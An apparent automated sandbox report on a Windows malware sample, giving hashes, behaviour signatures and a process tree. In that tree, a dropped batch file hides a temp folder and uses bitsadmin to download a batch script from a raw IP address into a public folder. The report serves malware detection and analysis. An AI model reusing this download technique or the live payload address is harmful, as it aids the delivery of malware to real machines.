Analysis

  • max time kernel
    14s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    06-08-2024 02:12

General

  • Target

    ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe

  • Size

    126KB

  • MD5

    b2dc0f8a36a7e450b11149a8e15ca964

  • SHA1

    27fd3d24a969b5b0528b69f1cbd8b293e74a6809

  • SHA256

    ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15

  • SHA512

    135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933

  • SSDEEP

    1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4

Score
8/10

Malware Config

Signatures

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
    "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t3935.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2324
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:2800
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:396
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2896
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3064
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /crEaTe pls
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:2616
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2684
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2632
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /ResUme pls
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2912
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1036
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2780
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2644
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /CompLete pls
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2788
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1968
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2564
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:2692

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\ytmp\t3935.bat

    Filesize

    2KB

    MD5

    3baa57d1131417b71e8d0bfb45f46ec3

    SHA1

    8443f01dc35d643cf2071c2dd90787d972de64f7

    SHA256

    5911b623c6db07db3193f1ea5f9ba561c04292ec9acabf4586469aa0c77058c8

    SHA512

    0563c9ad298a7f85880afd0f40867a6a67e13bc5a1b5c230f8545b8ba1dc896927b8eb34a54ad7880bd8d43f7108a2ede2710dcfdbf55abd9b22b0b4ef958024